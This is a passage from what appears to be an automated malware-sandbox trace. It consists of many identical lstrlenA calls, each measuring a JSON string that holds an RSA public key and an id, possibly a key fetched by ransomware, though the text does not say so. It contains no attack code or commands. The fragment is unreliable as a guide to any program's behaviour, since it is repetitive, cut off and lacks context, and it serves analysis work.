KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.539] lstrlenA (lpString="-----BEGIN PUBLIC 